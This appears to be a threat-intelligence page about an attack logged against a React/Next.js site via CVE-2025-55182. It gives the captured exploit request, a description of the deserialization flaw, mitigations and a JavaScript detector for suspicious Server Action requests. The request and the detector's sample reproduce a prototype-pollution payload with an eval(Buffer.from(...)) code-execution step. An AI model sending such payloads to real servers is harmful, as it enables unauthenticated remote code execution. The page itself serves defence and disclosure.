Attack information

Tag
CVE-2025-55182
Date
2026-05-09
Client IP
5.35.98.193
Client GEO
russia 
Vendor
Meta 
Product
React 
RAW request
POST / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/█████████ Safari/537.36
Host: blog.██████
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWRrO9Dm4nh1w
Content-Length: 1905
X-Forwarded-For: ███████████
Accept-Encoding: gzip
Next-Action: x
Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D
Next-Url: /
Origin: https://blog.██████
Referer: https://blog.██████
X-Ja3-Fingerprint: e69402f870ecf542b4f017b0ed32936a
X-Ja4-Fingerprint: t13d1312h2_f57a46bbacb6_e5728521abd4
X-Nextjs-Html-Request-Id: Ke44Jvtxlc
X-Nextjs-Request-Id: AgmDjUuKUY
Connection: close

------WebKitFormBoundaryWRrO9Dm4nh1w
Content-Disposition: form-data; name="Yg6RIsgU"

+8JnbN2Tt5MNsNs3CLtx64tpZR4J6C44J0bYbMvc91oZ1C1OIhI8lB+NVqtL/fxqzCNtS9Un3NcVxZ1cv39+UkxJcacanA3FDMm0SPg2nZgcEiQGnSEe6/IgfindCJTizuvdYit+2UjcIAJdhtyuGzEZH2HpIIGR20Qs9yEaJF4cM6sNCQ+UbJIx8bJCD6Sq3BKaZezsA7oUEj6tTHQS+KXfRNpYdYV000K6C3cvSm36h358Y/IZPe1NVtzQ32Ms
------WebKitFormBoundaryWRrO9Dm4nh1w
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"eval(Buffer.from('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','base64').toString())","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryWRrO9Dm4nh1w
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryWRrO9Dm4nh1w
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryWRrO9Dm4nh1w--
Description

CVE-2025-55182 affects react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack versions 19.0.0, 19.1.0, 19.1.1 and 19.2.0.

The root cause is unsafe deserialization in the RSC “Flight” protocol: when the server receives a specially crafted payload in an HTTP request to a Server Function endpoint, the payload is deserialized without proper validation. This can lead to prototype pollution or injection of malicious objects, which allows execution of arbitrary JavaScript code, effectively remote code execution (RCE).

The attack requires no authentication, has low complexity, and can be triggered via a single HTTP request.

Because many popular frameworks (e.g. Next.js, React Router, Waku, the Parcel/Vite RSC plugins, rwsdk) depend on the vulnerable packages, a large share of web apps is at risk.

The vulnerability was publicly disclosed on December 3, 2025, and patches were released shortly after.

Mitigations
  1. Upgrade react-server-dom packages: immediately update the affected packages to patched versions (for example react-server-dom-webpack/parcel/turbopack → 19.0.1, 19.1.2 or 19.2.1).
  2. Audit dependencies: check whether the project includes frameworks or bundlers that use RSC (for example Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, rwsdk) and update them to safe versions.
  3. Disable or restrict RSC endpoints: if possible, temporarily disable React Server Functions or restrict access to them with a firewall, WAF or network configuration.
  4. Runtime protection: use a WAF, EASM/ASM, behavioural monitoring and IDS/IPS to detect suspicious requests and post-exploitation activity.
  5. Code review / validation: review how incoming data is handled and avoid deserializing untrusted objects, especially where the application accepts user-supplied payloads. (Additional checking/validation of deserialized data may be required.)
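The runtime-protection step above (item 4) calls for detecting suspicious requests. As an added example, not taken from this page or from React/Next.js, the JavaScript below parses a raw multipart Server Action request and flags the Flight reference markers that are visible in the captured request at the top of the page (`__proto__`, a `constructor:constructor` chain, forged `_response`/`_prefix`/`_chunks`/`_formData` fields, a `resolved_model` status and an `eval(`/`Buffer.from(` string). The `Next-Action` header is the real Next.js Server Action marker; the host name, action id, boundary, field names and base64 blob in the sample requests are constructed, and the indicator list is this example's own heuristic, not a vendor signature.

```javascript
// Added example (not from the page or from React/Next.js): a request inspector for
// the runtime-detection mitigation. It parses a raw multipart Server Action request
// and flags Flight-protocol markers that a legitimate action payload does not carry.
// All sample requests below are constructed.

// Indicator patterns derived from the captured request on this page, each with a
// label for the alert. Legitimate action arguments are plain JSON values and do not
// reference __proto__, constructor chains or the internal _response/_chunks fields.
const INDICATORS = [
  [/__proto__/, 'prototype key in Flight reference'],
  [/\$\d+:constructor:constructor/, 'constructor chain reference'],
  [/"status"\s*:\s*"resolved_model"/, 'forged resolved_model chunk'],
  [/"_response"\s*:/, 'forged _response object'],
  [/"_prefix"\s*:/, 'forged chunk _prefix'],
  [/"_chunks"\s*:/, 'forged _chunks reference'],
  [/"_formData"\s*:/, 'forged _formData accessor'],
  [/\beval\s*\(|Buffer\.from\s*\(/, 'code-execution primitive in payload'],
];

// Minimal parser for a raw HTTP request: header map plus multipart form parts.
// Parts are returned as {name, value}; non-multipart bodies yield no parts.
function parseRequest(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  const head = sep < 0 ? raw : raw.slice(0, sep);
  const body = sep < 0 ? '' : raw.slice(sep + 4);
  const headers = {};
  for (const line of head.split('\r\n').slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  const parts = [];
  const m = /boundary=([^;]+)/.exec(headers['content-type'] || '');
  if (m) {
    for (const chunk of body.split('--' + m[1].trim())) {
      const seg = chunk.startsWith('\r\n') ? chunk.slice(2) : chunk;
      const j = seg.indexOf('\r\n\r\n');
      if (j < 0) continue; // preamble or the closing "--" marker
      const nm = /name="([^"]*)"/.exec(seg.slice(0, j));
      parts.push({ name: nm ? nm[1] : '', value: seg.slice(j + 4).replace(/\r\n$/, '') });
    }
  }
  return { headers, parts };
}

// Inspect one request. Only requests carrying the Next-Action header (the Next.js
// Server Action marker, also present in the captured request) are in scope.
function inspectServerAction(raw) {
  const { headers, parts } = parseRequest(raw);
  const findings = [];
  if (!Object.prototype.hasOwnProperty.call(headers, 'next-action')) {
    return { serverAction: false, findings };
  }
  for (const part of parts) {
    for (const [re, label] of INDICATORS) {
      if (re.test(part.value)) findings.push({ part: part.name, label });
    }
  }
  return { serverAction: true, findings };
}

// Helper to build the constructed multipart sample requests below.
const BOUNDARY = '----WebKitFormBoundaryCONSTRUCTED';
function buildRequest(extraHeaders, parts) {
  const head = ['POST / HTTP/1.1', 'Host: app.example.invalid',
    'Content-Type: multipart/form-data; boundary=' + BOUNDARY, ...extraHeaders];
  const body = [];
  for (const [name, value] of parts) {
    body.push('--' + BOUNDARY, 'Content-Disposition: form-data; name="' + name + '"', '', value);
  }
  body.push('--' + BOUNDARY + '--', '');
  return head.join('\r\n') + '\r\n\r\n' + body.join('\r\n');
}

// Constructed part shaped like field "0" of the captured request; the base64 blob is
// a placeholder, not real code.
const HOSTILE_PART = String.raw`{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,`
  + String.raw`"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"eval(Buffer.from('PLACEHOLDER_BASE64','base64').toString())",`
  + String.raw`"_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;

const HOSTILE_REQUEST = buildRequest(['Next-Action: x'], [
  ['blob', 'QUJDREVG'], // opaque field, as in the captured request
  ['0', HOSTILE_PART],
  ['1', '"$@0"'],
  ['2', '[]'],
]);
// A legitimate action call: the argument array is plain JSON (action id constructed).
const BENIGN_REQUEST = buildRequest(['Next-Action: 7f3a2b'], [['0', '[{"query":"status"}]']]);
// A non-action multipart upload is out of scope even when a field looks odd.
const UPLOAD_REQUEST = buildRequest([], [['file', '__proto__']]);

for (const [label, req] of [['hostile', HOSTILE_REQUEST], ['benign', BENIGN_REQUEST], ['upload', UPLOAD_REQUEST]]) {
  console.log(label, JSON.stringify(inspectServerAction(req)));
}
```

Run it with `node inspect.js`; the hostile sample produces eight findings, all in field `0`, while the benign action and the plain upload produce none. The same `inspectServerAction` check can sit in a reverse-proxy or WAF hook, but it is a string heuristic over the decoded body: differently encoded payloads can evade it, so it is a detection aid alongside the upgrade in item 1, not a substitute for it.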